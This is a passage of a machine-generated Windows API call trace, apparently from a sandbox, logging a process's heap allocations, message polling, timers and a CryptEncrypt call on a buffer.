dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0234.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0234.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0234.546] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0234.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0234.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0234.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0234.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0234.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0234.547] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0234.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0234.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51148 [0234.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0234.547] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0234.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0234.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0234.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0234.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0234.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0234.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0234.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0234.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0234.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0234.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0234.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0234.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0234.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0234.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0234.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0234.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0234.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0234.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0234.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0234.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0234.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0234.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0234.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0234.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0234.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0234.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0234.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0234.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0234.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0234.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0234.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0234.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0234.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0234.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0234.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0234.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0234.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0234.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0234.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0234.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0234.549] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0234.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0234.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0234.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0234.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0234.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0234.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51430 [0234.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51430, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0234.549] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x2641, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x2648) returned 1 [0234.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0234.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0234.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0234.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0234.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0234.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0234.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0234.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0234.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0234.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0234.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0234.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0234.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0234.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0234.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0234.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0234.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0234.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0234.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0234.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0234.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0234.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0234.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0234.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0234.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0234.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0234.551] CharLowerBuffW (in: lpsz="byte[9800]", cchLength=0xa | out: lpsz="byte[9800]") returned 0xa [0234.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0234.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0234.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0234.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0234.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0234.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0234.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0234.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0234.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0234.551] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0234.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0234.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0234.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0234.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0234.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0234.731] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0234.732] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0234.732] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0234.732] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0234.732] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0234.732] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.732] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0234.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0234.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0234.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0234.732] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0234.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0234.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0234.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0234.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0234.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0234.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0234.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0234.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0234.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0234.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0234.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0234.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0234.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0234.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0234.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0234.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0234.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0234.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0234.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0234.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0234.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0234.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0234.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0234.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0234.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0234.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0234.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0234.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0234.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0234.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0234.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0234.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0234.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0234.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0234.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0234.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0234.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0234.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0234.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0234.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0234.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0234.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0234.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0234.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0234.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0234.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0234.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0234.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0234.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0234.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0234.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0234.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0234.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0234.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0234.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0234.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0234.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0234.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0234.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0234.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0234.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0234.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0234.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2641) returned 0x2f194b8 [0234.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f194b8 | out: hHeap=0x970000) returned 1 [0234.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0234.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0234.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0234.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0234.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0234.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0234.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0234.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x978490 [0234.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0234.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0234.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0234.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0234.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0234.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0234.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0234.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0234.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0234.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0234.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0234.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0234.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0234.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0234.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0234.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0234.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0234.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0234.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0234.736] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0234.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0234.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0234.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0234.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0234.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0234.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0234.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0234.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0234.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0234.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0234.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0234.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0234.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0234.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0234.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 